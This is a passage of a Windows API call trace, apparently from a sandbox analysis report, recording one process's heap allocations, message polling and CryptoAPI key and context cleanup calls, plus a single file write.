dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0227.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55118 [0227.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0227.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0227.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0227.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0227.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0227.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5118) returned 0x2f23b78 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0227.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0227.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5118) returned 0x2f28c98 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f23b78 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0227.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0227.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.480] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0227.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.480] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0227.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0227.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0227.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0227.480] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0227.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0227.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.481] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.481] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0227.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.481] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.481] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0227.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.482] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0227.482] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0227.482] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0227.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.484] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.484] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0227.484] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.485] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x5118, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x5118, lpOverlapped=0x0) returned 1 [0227.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0227.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0227.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.487] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0227.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0227.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.487] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.487] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0227.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0227.487] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0227.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0227.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51040, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0227.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.488] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0227.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.488] CryptDestroyKey (hKey=0xa87550) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.488] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0227.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0227.489] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.489] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0227.489] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0227.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0227.489] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0227.489] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0227.489] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0227.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0227.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.490] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.490] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0227.490] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0227.490] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0227.490] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0227.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0227.491] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0227.491] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0227.491] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0227.491] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0227.491] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.491] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.491] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.491] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0227.491] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.492] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.492] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.492] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0227.492] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0227.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, 